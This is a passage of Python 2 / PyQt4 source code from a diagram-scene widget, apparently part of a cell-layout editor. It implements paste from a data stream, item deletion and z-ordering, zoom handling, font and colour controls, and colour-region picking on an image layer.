# open a data stream that can read from that byte array:\n            lDataStream = QtCore.QDataStream(lItemDataByteArray, QtCore.QIODevice.ReadOnly)\n\n            # according to Qt documentation:\n            #   \"because QVariant is part of the QtCore library, it cannot provide conversion\n            #   functions to data types defined in QtGui, such as QColor, QImage, and QPixmap.\n            #   In other words, there is no toColor() function. Instead, you can use the\n            #   QVariant::value() or the qVariantValue() template function\"\n            #   But the value() template trick doesn't work with PyQt, and unfortunately\n            #   there is no PyQt documentation to explain why, nor show any workarounds.\n\n            
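# the reads below must mirror, in the exact same order, the writes\n            #   performed by copyItem() above: position, has-been-cut flag, color,\n            #   region-or-cell, diagram type, scaleX, scaleY, point x list, point y list.\n            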
# read from the datastream:\n            lSelectedItemPosition = lDataStream.readQVariant().toPointF()\n            lSelectedItemHasBeenCut = lDataStream.readQVariant().toBool()\n            lSelectedItemColor = QtGui.QColor(lDataStream.readQVariant()) \n            # a bit counterintuitively, the toInt() and toFloat() functions DON'T return\n            #   ints or floats... they return pairs of (value, ok-flag) - e.g. toInt()\n            #   yields (5, True) - so we grab the first element of each pair:\n            lSelectedItemRegionOrCell = lDataStream.readQVariant().toInt()[0]\n            lSelectedItemType = lDataStream.readQVariant().toInt()[0]\n            lSelectedItemScaleX = lDataStream.readQVariant().toFloat()[0]\n            lSelectedItemScaleY = lDataStream.readQVariant().toFloat()[0]\n            \n            lListOfPointsX = lDataStream.readQVariant().toList()\n            lListOfPointsY = lDataStream.readQVariant().toList()\n            CDConstants.printOut(\"PASTE: lListOfPointsX = \"+str(lListOfPointsX), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lListOfPointsY = \"+str(lListOfPointsY), CDConstants.DebugTODO )\n            lLengthX = len(lListOfPointsX)\n            lLengthY = len(lListOfPointsY)\n            if lLengthX != lLengthY:\n                CDConstants.printOut(\"PASTE: received INCONSISTENT paste data! Can't paste.\", CDConstants.DebugTODO )\n                return\n\n\n            lSelectedItemPolygon = QtGui.QPolygonF()\n            # CDConstants.printOut( \" \"+str( \"PASTE: lSelectedItemPolygon =\", lSelectedItemPolygon )+\" \", CDConstants.DebugTODO )\n\n\n            for i in xrange(lLengthX):\n                # CDConstants.printOut( \" \"+str( \"PASTE: lListOfPointsX[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n                # CDConstants.printOut( \" \"+str( \"PASTE: lListOfPointsY[i].toFloat() = \", lListOfPointsY[i].toFloat() )+\" \", CDConstants.DebugTODO )\n                lPointF = QtCore.QPointF(lListOfPointsX[i].toFloat()[0], lListOfPointsY[i].toFloat()[0])\n                # CDConstants.printOut( \" \"+str( \"PASTE: lPointF =\", lPointF )+\" \", CDConstants.DebugTODO )\n                lSelectedItemPolygon.append(lPointF)\n\n\n            CDConstants.printOut(\"PASTE: lSelectedItemPosition = \"+str(lSelectedItemPosition), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemHasBeenCut = \"+str(lSelectedItemHasBeenCut), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemColor = \"+str(lSelectedItemColor), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemRegionOrCell = \"+str(lSelectedItemRegionOrCell), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemType = \"+str(lSelectedItemType), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemScaleX = \"+str(lSelectedItemScaleX), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemScaleY = \"+str(lSelectedItemScaleY), CDConstants.DebugTODO )\n            CDConstants.printOut(\"PASTE: lSelectedItemPolygon = \"+str(lSelectedItemPolygon), CDConstants.DebugTODO )\n\n            # convert the polygon we've constructed from pasted QPointF values\n            #   into a QPainterPath which can be digested by the DiagramItem constructor:\n            lPath = QtGui.QPainterPath()\n            lPath.addPolygon(lSelectedItemPolygon)\n            lTheNewItem = DiagramItem(lPath, self.scene.myItemMenu)\n            # set the new item's color i.e. brush value:\n            lTheNewItem.setBrush(lSelectedItemColor)\n            # 2011 - Mitja: the new item is a region of cells or a single cell:\n            lTheNewItem.setRegionOrCell(lSelectedItemRegionOrCell)\n\n            # finally, place the newly built item, i.e. 
\"paste\" it into the Cell Scene:\n self.scene.addItem(lTheNewItem)\n\n # to provide the default behavior of having the new item selected,\n # first unselect all selected items in the scene:\n for anItem in self.scene.selectedItems():\n anItem.setSelected(False)\n # then select the newly created item:\n lTheNewItem.setSelected(True)\n\n # emit our own signal to the handler which does other GUI adjustments\n # whenever a new signal is inserted:\n self.scene.signalThatItemInserted.emit(lTheNewItem)\n\n # position the new item in the scene:\n if lSelectedItemHasBeenCut == False:\n # shift the copied item's position slightly if it wasn't \"cut\",\n # so that when it's pasted back it is distinguishable from the original:\n lSelectedItemPosition.setX ( lSelectedItemPosition.x() + 13.0 )\n lSelectedItemPosition.setY ( lSelectedItemPosition.y() + 13.0 )\n lTheNewItem.setPos(lSelectedItemPosition)\n \n # set the same size transformation to the pasted item as it had from the copied/cut one:\n lTheNewItem.myScaleX = lSelectedItemScaleX\n lTheNewItem.myScaleY = lSelectedItemScaleY\n # using QTransform, we first create a transformation, then we apply it to the item:\n lTransform = QtGui.QTransform()\n lTransform.scale( lTheNewItem.myScaleX, lTheNewItem.myScaleY )\n lTheNewItem.setTransform( lTransform )\n \n # 2011 - Mitja: after setting the pasted item's color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.scene.addToRegionColorsInUse(lSelectedItemColor)\n\n \n\n\n # ------------------------------------------------------------\n def deleteItem(self):\n for item in self.scene.selectedItems():\n if isinstance(item, DiagramItem):\n item.removeArrows()\n\n # 2011 - Mitja: after obtaining the deleted item's color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n lSelectedItemColor = item.brush()\n self.scene.subtractFromRegionColorsInUse(lSelectedItemColor)\n\n self.scene.removeItem(item)\n \n # 2010 - Mitja - clear any outlines which may be in use for resizing:\n self.scene.stopOutlineResizing()\n \n # 2011 - Mitja - clear any x/y/w/h information about current item:\n lBoundingRect = QtCore.QRectF(0.0, 0.0, 0.0, 0.0)\n self.scene.signalThatItemResized.emit(lBoundingRect)\n \n\n\n # ------------------------------------------------------------------\n # 2010 Mitja - slot method handling \"signalLayersSelectionModeHasChanged\"\n # events (AKA signals) arriving from theControlsForLayerSelection:\n # ------------------------------------------------------------------\n def handleLayersSelectionModeHasChanged(self, pNewMode):\n\n CDConstants.printOut( \"___ starting handleLayersSelectionModeHasChanged( pNewMode == \"+str(pNewMode)+\" ) ....\", CDConstants.DebugTODO )\n # we used to query which button is checked explicitly, but we now\n # receive that information as parameter directly from the signal:\n # lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n self.scene.setMode(pNewMode)\n\n # 2011 - Mitja: enable/disable SceneModeImageLayer-specific buttons:\n if self.scene.getMode() == CDConstants.SceneModeImageLayer:\n self.theControlsForInputImagePicking.setEnabled(True)\n else:\n self.theControlsForInputImagePicking.setEnabled(False)\n\n # 2011 - Mitja: enable/disable SceneModeImageSequence-specific controls:\n if self.scene.getMode() == CDConstants.SceneModeImageSequence:\n self.theControlsForImageSequence.setEnabled(True)\n # 
# ------------------------------------------------------------------\n    # 2010 Mitja - slot method handling \"signalLayersSelectionModeHasChanged\"\n    #   events (AKA signals) arriving from theControlsForLayerSelection:\n    # ------------------------------------------------------------------\n    def handleLayersSelectionModeHasChanged(self, pNewMode):\n\n        CDConstants.printOut( \"___ starting handleLayersSelectionModeHasChanged( pNewMode == \"+str(pNewMode)+\" ) ....\", CDConstants.DebugTODO )\n        # we used to query which button is checked explicitly, but we now\n        #   receive that information as parameter directly from the signal:\n        # lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n        self.scene.setMode(pNewMode)\n\n        # 2011 - Mitja: enable/disable SceneModeImageLayer-specific buttons:\n        if self.scene.getMode() == CDConstants.SceneModeImageLayer:\n            self.theControlsForInputImagePicking.setEnabled(True)\n        else:\n            self.theControlsForInputImagePicking.setEnabled(False)\n\n        # 2011 - Mitja: enable/disable SceneModeImageSequence-specific controls:\n        if self.scene.getMode() == CDConstants.SceneModeImageSequence:\n            self.theControlsForImageSequence.setEnabled(True)\n            # signal upstream about the updated usage of this region color:\n            self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOn()\n            CDConstants.printOut( \"   in handleLayersSelectionModeHasChanged() -- self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOn() called.\", CDConstants.DebugTODO )\n        else:\n            self.theControlsForImageSequence.setEnabled(False)\n            # signal upstream about the updated usage of this region color:\n            self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOff()\n            CDConstants.printOut( \"   in handleLayersSelectionModeHasChanged() -- self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOff() called.\", CDConstants.DebugTODO )\n\n        CDConstants.printOut( \"___ ending handleLayersSelectionModeHasChanged( pNewMode == \"+str(pNewMode)+\" ) ....done.\", CDConstants.DebugTODO )\n\n    # ------------------------------------------------------------\n    def bringToFront(self):\n        if not self.scene.selectedItems():\n            return\n\n        selectedItem = self.scene.selectedItems()[0]\n        overlapItems = selectedItem.collidingItems()\n\n        zValue = 0\n        for item in overlapItems:\n            if (item.zValue() >= zValue and isinstance(item, DiagramItem)):\n                zValue = item.zValue() + 0.1\n        selectedItem.setZValue(zValue)\n\n    # ------------------------------------------------------------\n    def sendToBack(self):\n        if not self.scene.selectedItems():\n            return\n\n        selectedItem = self.scene.selectedItems()[0]\n        overlapItems = selectedItem.collidingItems()\n\n        zValue = 0\n        for item in overlapItems:\n            if (item.zValue() <= zValue and isinstance(item, DiagramItem)):\n                zValue = item.zValue() - 0.1\n        selectedItem.setZValue(zValue)\n\n    # ------------------------------------------------------------\n    def handlerForItemInserted(self, item):\n        self.theControlsForLayerSelection.setCheckedButton( \\\n            CDConstants.SceneModeMoveItem, True )\n        lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n        self.scene.setMode(lCheckedId)\n\n        # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n        self.theControlsForInputImagePicking.setEnabled(False)\n\n        # 2011 - Mitja: disable SceneModeImageSequence-specific buttons:\n        self.theControlsForImageSequence.setEnabled(False)\n\n        # 2010 - Mitja: add code for handling insertion of pixmap items:\n        try:\n            self.theButtonGroupForRegionShapes.button(item.diagramType).setChecked(False)\n        except:\n            CDConstants.printOut(\"EXCEPTION EXCEPTION EXCEPTION item item item item = \"+str(item), CDConstants.DebugTODO )\n            pass\n\n\n\n    # ------------------------------------------------------------\n    def handlerForMouseMoved(self, pDict):\n        lDict = dict(pDict)\n        self.theControlsForInputImagePicking.setFreehandXLabel(lDict[0])\n        self.theControlsForInputImagePicking.setFreehandYLabel(lDict[1])\n        self.theControlsForInputImagePicking.setFreehandColorLabel( \\\n            QtGui.QColor( lDict[2], lDict[3], lDict[4] ) )\n\n\n\n    # ------------------------------------------------------------\n    def handlerForItemResized(self, pRect):\n        lRect = QtCore.QRectF(pRect)\n#         CDConstants.printOut( \" \"+str( lRect )+\" \", CDConstants.DebugTODO )\n        self.windowPIFControlPanel.setResizingItemXLabel(str(int(lRect.x())))\n        self.windowPIFControlPanel.setResizingItemYLabel(str(int(lRect.y())))\n        self.windowPIFControlPanel.setResizingItemWidthLabel(str(int(lRect.width())))\n        self.windowPIFControlPanel.setResizingItemHeightLabel(str(int(lRect.height())))\n#         self.scene.setMode(self.theControlsForLayerSelection.getCheckedButtonId())\n#         self.theButtonGroupForRegionShapes.button(self.InsertTextButton).setChecked(False)\n#         self.theControlsForInputImagePicking.setEnabled(False)\n\n\n    
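# a short wiring sketch for the handler above: DiagramScene emits\n    #   signalThatItemResized with the selected item's sceneBoundingRect()\n    #   (see its mouseMoveEvent), and - presumably in connectSignals(), an\n    #   assumption here - it is connected as:\n    #\n    #     self.scene.signalThatItemResized.connect(self.handlerForItemResized)\n    #\n    #   so emitting e.g. QtCore.QRectF(10.0, 20.0, 30.0, 40.0) updates the\n    #   x/y/w/h labels in the control panel to 10, 20, 30 and 40.\n\n\n    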
# ------------------------------------------------------------\n    # 2011 - Mitja: moving to a MVC design,\n    #   this connect signal handler should go to the Controller object!\n    # ------------------------------------------------------------\n    def handlerForSceneResized(self, pDict):\n        lDict = dict(pDict)\n        print\n        CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n        CDConstants.printOut(str( lDict ) , CDConstants.DebugTODO )\n        CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n        print\n        self.windowPIFControlPanel.setSceneWidthLabel(lDict[0])\n        self.windowPIFControlPanel.setSceneHeightLabel(lDict[1])\n        self.windowPIFControlPanel.setSceneDepthLabel(lDict[2])\n        self.windowPIFControlPanel.setSceneUnitsLabel(lDict[3])\n\n\n    # ------------------------------------------------------------\n    def handlerForTextInserted(self, item):\n        self.theButtonGroupForRegionShapes.button(self.InsertTextButton).setChecked(False)\n        lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n        self.scene.setMode(lCheckedId)\n        # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n        self.theControlsForInputImagePicking.setEnabled(False)\n        # 2011 - Mitja: disable SceneModeImageSequence-specific buttons:\n        self.theControlsForImageSequence.setEnabled(False)\n\n    # ------------------------------------------------------------\n    def currentFontChanged(self, font):\n        self.handleFontChange()\n\n    # ------------------------------------------------------------\n    def fontSizeChanged(self, font):\n        self.handleFontChange()\n\n\n    # ------------------------------------------------------------------\n    # 2010 Mitja - this is a slot method to handle\n    #   \"current index changed\" events (AKA signals) arriving from\n    #   the object theSceneScaleZoomControl\n    # ------------------------------------------------------------------\n    def handleSceneScaleZoomChanged(self, pScale):\n        lNewScale = pScale.left(pScale.indexOf(\"%\")).toDouble()[0] / 100.0\n        oldMatrix = self.view.matrix()\n        self.view.resetMatrix()\n        self.view.translate(oldMatrix.dx(), oldMatrix.dy())\n        # take care of the RHS <-> LHS mismatch at its visible end,\n        #   by flipping the y coordinate in the QGraphicsView's affine transformations:\n        self.view.scale(lNewScale, -lNewScale)\n        # 2011 Mitja - add scale/zoom parameters stored into our DiagramScene object:\n        self.scene.myViewScaleZoomX = lNewScale\n        self.scene.myViewScaleZoomY = lNewScale\n        CDConstants.printOut( \"___ - DEBUG ----- CDDiagramSceneMainWidget.handleSceneScaleZoomChanged() - self.scene.myViewScaleZoomX = \" + \\\n            str(self.scene.myViewScaleZoomX) + \" self.scene.myViewScaleZoomY = \" + str(self.scene.myViewScaleZoomY) , CDConstants.DebugVerbose )\n\n\n\n    # ------------------------------------------------------------------\n    # 2010 Mitja - this is a slot method to handle\n    #   \"current index changed\" events (AKA signals) arriving from\n    #   the object theControlsForInputImagePicking\n    # ------------------------------------------------------------------\n    def handleImageScaleZoomChanged(self, pScale):\n        lNewScale = pScale.left(pScale.indexOf(\"%\")).toDouble()[0] / 100.0\n\n        if isinstance(self.scene.theImageLayer, CDImageLayer) == True:\n            self.scene.theImageLayer.setScaleZoom( lNewScale )\n\n        self.scene.update()\n\n        
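# worked example of the parsing above (pScale is a PyQt4 QString):\n        #   for pScale == \"150%\" : indexOf(\"%\") is 3, left(3) is \"150\",\n        #   toDouble() returns the pair (150.0, True), and [0] / 100.0 gives 1.5\n        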
CDConstants.printOut(\" self.theCDImageLayer.scaleFactor = \"+str(self.theCDImageLayer.scaleFactor) , CDConstants.DebugTODO )\n\n\n\n # ------------------------------------------------------------\n def textColorChanged(self):\n self.textAction = self.sender()\n self.fontColorToolButton.setIcon(self.createColorToolButtonIcon(\n ':/icons/textpointer.png',\n QtGui.QColor(self.textAction.data())))\n self.textButtonTriggered()\n\n\n # ------------------------------------------------------------\n def lineColorChanged(self):\n self.lineAction = self.sender()\n self.lineColorToolButton.setIcon(self.createColorToolButtonIcon(\n ':/icons/linecolor.png',\n QtGui.QColor(self.lineAction.data())))\n self.lineButtonTriggered()\n\n # ------------------------------------------------------------\n def textButtonTriggered(self):\n self.scene.setTextColor(QtGui.QColor(self.textAction.data()))\n\n # ------------------------------------------------------------\n def lineButtonTriggered(self):\n self.scene.setLineColor(QtGui.QColor(self.lineAction.data()))\n\n # ------------------------------------------------------------\n def handleFontChange(self):\n font = self.fontCombo.currentFont()\n font.setPointSize(self.fontSizeCombo.currentText().toInt()[0])\n if self.boldAction.isChecked():\n font.setWeight(QtGui.QFont.Bold)\n else:\n font.setWeight(QtGui.QFont.Normal)\n font.setItalic(self.italicAction.isChecked())\n font.setUnderline(self.underlineAction.isChecked())\n\n self.scene.setFont(font)\n\n # ------------------------------------------------------------\n def handlerForItemSelected(self, item):\n font = item.font()\n color = item.defaultTextColor()\n self.fontCombo.setCurrentFont(font)\n self.fontSizeCombo.setEditText(str(font.pointSize()))\n self.boldAction.setChecked(font.weight() == QtGui.QFont.Bold)\n self.italicAction.setChecked(font.italic())\n self.underlineAction.setChecked(font.underline())\n\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"current type color\" events\n # (AKA signals) arriving from the object theControlsForTypes\n # ------------------------------------------------------------\n def handleTypesColorEvent(self, pColor):\n # CDConstants.printOut( \" \"+str( \"handleTypesColorEvent received pColor =\", pColor )+\" \", CDConstants.DebugTODO )\n \n # this signal has to be handled differently according to the current mode:\n\n # 2011 - Mitja - use this overlay routine to draw selected content from an image sequence\n # as foreground to the graphics scene, in \"SceneModeImageSequence\"\n if (self.scene.mySceneMode == CDConstants.SceneModeImageSequence):\n self.scene.setSequenceColor(QtGui.QColor(pColor))\n else:\n self.scene.setItemColor(QtGui.QColor(pColor))\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"button change\" events\n # (AKA signals) arriving from the object theToggleforRegionOrCellDrawing\n # ------------------------------------------------------------------\n def handleToggleRegionOrCellDrawingChanged(self, pRegionOrCell):\n # this is a SLOT function for the signal \"signalSetRegionOrCell()\"\n # from theToggleforRegionOrCellDrawing\n #\n # here we retrieve the updated value from radio buttons and update\n # the global keeping track of the drawing mode:\n # 0 = Cell Draw = CDConstants.ItsaCellConst\n # 1 = Region Draw = CDConstants.ItsaRegionConst\n\n self.scene.setItemRegionOrCell(pRegionOrCell)\n\n 
CDConstants.printOut( \" self.handleToggleRegionOrCellDrawingChanged: \"+str(pRegionOrCell) , CDConstants.DebugExcessive )\n\n\n\n\n\n # ------------------------------------------------------------------\n # 2010 Mitja - this is a slot method to handle \"button change\" events\n # (AKA signals) arriving from the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleInputImagePickingModeChanged(self):\n # SLOT function for the signal \"inputImagePickingModeChangedSignal()\"\n # from theControlsForInputImagePicking\n #\n # here we retrieve the updated values from radio buttons and update\n # the global keeping track of what's been changed:\n # 0 = Color Pick = CDConstants.ImageModePickColor\n # 1 = Freehand Draw = CDConstants.ImageModeDrawFreehand\n # 2 = Polygon Draw = CDConstants.ImageModeDrawPolygon\n # 3 = Extract Cells = CDConstants.ImageModeExtractCells\n self.theCDImageLayer.inputImagePickingMode = \\\n self.theControlsForInputImagePicking.theInputImagePickingMode\n\n # if inputImagePickingMode is 3, i.e. Polygon Draw,\n # then we need to track *passive* mouse motion;\n # same for mode 0, i.e. Color Pick, and mode 3, i.e. Extract Cells\n #\n # otherwise we only track *active* mouse motion (which is the default for QWidget),\n # i.e. when at least one mouse button is pressed while the mouse is moved:\n if (self.theCDImageLayer.inputImagePickingMode == CDConstants.ImageModeDrawPolygon):\n self.theCDImageLayer.setMouseTracking(True)\n elif (self.theCDImageLayer.inputImagePickingMode == CDConstants.ImageModePickColor):\n self.theCDImageLayer.setMouseTracking(True)\n elif (self.theCDImageLayer.inputImagePickingMode == CDConstants.ImageModeExtractCells):\n self.theCDImageLayer.setMouseTracking(True)\n else:\n self.theCDImageLayer.setMouseTracking(False)\n\n self.scene.update()\n\n CDConstants.printOut(\" self.theCDImageLayer.inputImagePickingMode = \"+str(self.theCDImageLayer.inputImagePickingMode) , CDConstants.DebugTODO )\n\n\n\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"slider change\" events\n # (AKA signals) arriving from the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleImageOpacityChanged(self):\n # SLOT function for the signal \"inputImageOpacityChangedSignal()\"\n # from theControlsForInputImagePicking\n #\n # here we retrieve the updated value from the opacity slider and update\n # from the class global keeping track of the required opacity:\n # 0 = minimum = the image is completely transparent (invisible)\n # 100 = minimum = the image is completely opaque\n\n if isinstance(self.scene.theImageLayer, CDImageLayer) == True:\n self.scene.theImageLayer.setImageOpacity( \\\n self.theControlsForInputImagePicking.theImageOpacity )\n\n self.scene.update()\n\n CDConstants.printOut(\" self.theCDImageLayer.imageOpacity = \"+str(self.theCDImageLayer.imageOpacity) , CDConstants.DebugTODO )\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"slider change\" events\n # (AKA signals) arriving from the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleFuzzyPickThresholdChanged(self):\n # SLOT function for the signal \"fuzzyPickTresholdChangedSignal()\"\n # from theControlsForInputImagePicking\n #\n # here we retrieve the 
# ------------------------------------------------------------------\n    # 2011 Mitja - this is a slot method to handle \"slider change\" events\n    #   (AKA signals) arriving from the object theControlsForInputImagePicking\n    # ------------------------------------------------------------------\n    def handleFuzzyPickThresholdChanged(self):\n        # SLOT function for the signal \"fuzzyPickTresholdChangedSignal()\"\n        #   from theControlsForInputImagePicking\n        #\n        # here we retrieve the updated value from the threshold slider and update\n        #   from the class global keeping track of the fuzzy pick threshold:\n        #   0 = minimum = pick only the seed color\n        #   100 = maximum = pick everything in the image\n\n        if isinstance(self.scene.theImageLayer, CDImageLayer) == True:\n            self.scene.theImageLayer.setFuzzyPickTreshold( \\\n                self.theControlsForInputImagePicking.theFuzzyPickTreshold )\n\n        self.scene.update()\n\n        CDConstants.printOut(\" self.theCDImageLayer.fuzzyPickTreshold =\"+str(self.theCDImageLayer.fuzzyPickTreshold) , CDConstants.DebugTODO )\n\n\n\n    # ---------------------------------------------------------\n    # 2011 - Mitja: handleMousePressedInImageLayerSignal() is called every time\n    #   the theCDImageLayer object emits a \"mousePressedInImageLayerSignal()\" signal,\n    #   (defined in the CDImageLayer class's mousePressEvent() function),\n    # ---------------------------------------------------------\n    def handleMousePressedInImageLayerSignal(self):\n\n        # 2011 - Mitja: only do something about mouse clicks within the theCDImageLayer\n        #   if the theCDImageLayer contains an image loaded from a file.\n        #   Otherwise do nothing:\n        if self.theCDImageLayer.imageLoadedFromFile == False:\n            CDConstants.printOut(\"2011 DEBUG: ---- ---- CDDiagramSceneMainWidget ---- ---- handleMousePressedInImageLayerSignal() has no input image. Returning.\", CDConstants.DebugTODO )\n            return\n\n        # 2011 - Mitja: obtain the x,y coordinates where the mouse was clicked\n        #   within the theCDImageLayer:\n        x = self.theCDImageLayer.myMouseX\n        y = self.theCDImageLayer.myMouseY\n        # 2011 - Mitja: obtain the color of the pixel at coordinates x,y as\n        #   QRgb type in the format #AARRGGBB (equivalent to an unsigned int) :\n        lRGBAColorAtClickedPixel = self.theCDImageLayer.processedImage.pixel(x,y)\n\n        # 2011 - Mitja: if asked to ignore white or black, ignore clicks on white or black:\n        if (self.parentWindow.ignoreWhiteRegionsForPIF == True) and (lRGBAColorAtClickedPixel == QtGui.QColor(QtCore.Qt.white).rgba()) :\n            CDConstants.printOut(\"2011 DEBUG: ---- ---- CDDiagramSceneMainWidget ---- ---- handleMousePressedInImageLayerSignal() clicked on white. Returning.\", CDConstants.DebugTODO )\n            return # do nothing\n        if (self.parentWindow.ignoreBlackRegionsForPIF == True) and (lRGBAColorAtClickedPixel == QtGui.QColor(QtCore.Qt.black).rgba()) :\n            CDConstants.printOut(\"2011 DEBUG: ---- ---- CDDiagramSceneMainWidget ---- ---- handleMousePressedInImageLayerSignal() clicked on black. 
Returning.\", CDConstants.DebugTODO )\n return # do nothing\n\n # 2011 - Mitja: now find if the picked color is actually in the list of scene colors,\n # or if we need to compute the closest one:\n if lRGBAColorAtClickedPixel in self.parentWindow.colorDict:\n lRegionName = self.parentWindow.colorDict[lRGBAColorAtClickedPixel]\n lRGBAClosestColor = lRGBAColorAtClickedPixel\n else:\n lColorDistance = 9999.9\n lRGBAClosestColor = 0\n for lRegionColor in self.parentWindow.colorIds:\n r1 = QtGui.QColor(lRGBAColorAtClickedPixel).redF()\n g1 = QtGui.QColor(lRGBAColorAtClickedPixel).greenF()\n b1 = QtGui.QColor(lRGBAColorAtClickedPixel).blueF()\n r2 = QtGui.QColor(lRegionColor).redF()\n g2 = QtGui.QColor(lRegionColor).greenF()\n b2 = QtGui.QColor(lRegionColor).blueF()\n d = ((r2-r1)*0.30) * ((r2-r1)*0.30) \\\n + ((g2-g1)*0.59) * ((g2-g1)*0.59) \\\n + ((b2-b1)*0.11) * ((b2-b1)*0.11)\n CDConstants.printOut(\"r1, g1, b1, r2, g2, b2, d, lColorDistance, lRGBAClosestColor =\"+str(r1)+\", \"+str(g1)+\", \"+str(b1)+\", \"+str(r2)+\", \"+str(g2)+\", \"+str(b2)+\", \"+str(d)+\", \"+str(lColorDistance)+\", \"+str(lRGBAClosestColor) , CDConstants.DebugTODO )\n if (lColorDistance > d) :\n lRGBAClosestColor = lRegionColor\n lColorDistance = d\n\n CDConstants.printOut(\"Inserting\", CDConstants.DebugTODO )\n CDConstants.printOut(str( lRGBAColorAtClickedPixel) , CDConstants.DebugTODO )\n CDConstants.printOut(str( lRGBAClosestColor) , CDConstants.DebugTODO )\n CDConstants.printOut(str( self.parentWindow.comboDict[lRGBAClosestColor] ) , CDConstants.DebugTODO )\n\n lClosestColor = QtGui.QColor(lRGBAClosestColor)\n lClickedPixelColor = QtGui.QColor(lRGBAColorAtClickedPixel)\n\n \n # 2011 - Mitja: this is how we'd get from key to region name:\n # key = (int)(self.parentWindow.ui.colorId2Text.text())\n # name = self.parentWindow.colorDict[key]\n \n # 2011 - Mitja: add functionality for picking a color region: \n if (self.parentWindow.pickColorRegion == True) :\n\n # 1. get a *pixmap copy* of the QImage from theCDImageLayer:\n lOriginalPixmap = QtGui.QPixmap( QtGui.QPixmap.fromImage(self.theCDImageLayer.processedImage) )\n # 2. create a \"mask\" QBitmap object from lOriginalPixmap's pixels NOT in the clicked color:\n lTheMaskBitmap = lOriginalPixmap.createMaskFromColor(lClickedPixelColor, QtCore.Qt.MaskOutColor)\n # 3. apply lTheMaskBitmap to lOriginalPixmap, so that it eliminates all other color pixels from it:\n # ------> BUT the setMask() function applied to lOriginalPixmap will ALSO mask the theCDImageLayer... WHY???\n # lOriginalPixmap.setMask( lTheMaskBitmap )\n\n # 3. create an empty pixmap where to store the composed image:\n lResultPixmap = QtGui.QPixmap(self.theCDImageLayer.width, self.theCDImageLayer.height)\n # 4. create a QPainter to perform the overlay operation:\n lPainter = QtGui.QPainter(lResultPixmap)\n # 5. 
do the overlay:\n lPainter.setCompositionMode(lPainter.CompositionMode_Source)\n lPainter.fillRect(lResultPixmap.rect(), QtCore.Qt.transparent)\n lPainter.setCompositionMode(lPainter.CompositionMode_SourceOver)\n lPainter.drawPixmap(QtCore.QPoint(0,0), lOriginalPixmap)\n lPainter.end() \n\n # don't copy the input image back to theCDImageLayer:\n # self.theCDImageLayer.setPixmap(lResultPixmap)\n # self.scene.update()\n \n # now obtain a QRegion from the pixmap:\n theRegionFromBitmap = QtGui.QRegion(lTheMaskBitmap)\n # create a QGraphicsItem from a QPainterPath created from the pixmap:\n thePainterPath = QtGui.QPainterPath()\n thePainterPath.addRegion(theRegionFromBitmap)\n theGraphicsPathItem = QtGui.QGraphicsPathItem(thePainterPath)\n\n # create a QGraphicsItem from the pixmap:\n theGraphicsPixmapItem = QtGui.QGraphicsPixmapItem(lOriginalPixmap)\n\n if (self.parentWindow.pickColorAsPath == False) :\n theGraphicsItem = theGraphicsPixmapItem\n # this always remains True since we only pick colors as paths (polygons) now:\n # self.parentWindow.pickColorAsPath = True\n else :\n theGraphicsItem = theGraphicsPathItem\n # this always remains True since we only pick colors as paths (polygons) now:\n # self.parentWindow.pickColorAsPath = False\n\n # set the graphics item's color to be the one we computed above\n # (i.e. either it's already the same as in our list of scene colors,\n # or we computed the closest one) :\n theGraphicsItem.setBrush(lClosestColor)\n\n # pass the QGraphicsItem to the external QGraphicsScene window:\n self.scene.mousePressEvent( \\\n QtGui.QMouseEvent( QtCore.QEvent.GraphicsSceneMousePress, \\\n QtCore.QPoint(x,y), \\\n QtCore.Qt.NoButton, QtCore.Qt.NoButton, QtCore.Qt.NoModifier), \\\n theGraphicsItem )\n\n\n # 2011 - Mitja: restore the original QImage loaded from a file\n # back into the processed QImage, undoing all color processing.\n self.theCDImageLayer.setToProcessedImage()\n\n\n\n\n\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: moving to a MVC design, TODO:\n # this connect signal handler should go to the Controller object!\n #\n # handleImageSequenceResized() responds to signalThatImageSequenceResized changes\n # ------------------------------------------------------------\n def handleImageSequenceResized(self, pDict):\n lDict = dict(pDict)\n CDConstants.printOut(\"CDDiagramSceneMainWidget - handleImageSequenceResized() - \" + \\\n str( lDict ), CDConstants.DebugTODO )\n self.windowPIFControlPanel.setImageSequenceWidthLabel(lDict[0])\n self.windowPIFControlPanel.setImageSequenceHeightLabel(lDict[1])\n self.windowPIFControlPanel.setImageSequenceDepthLabel(lDict[2])\n 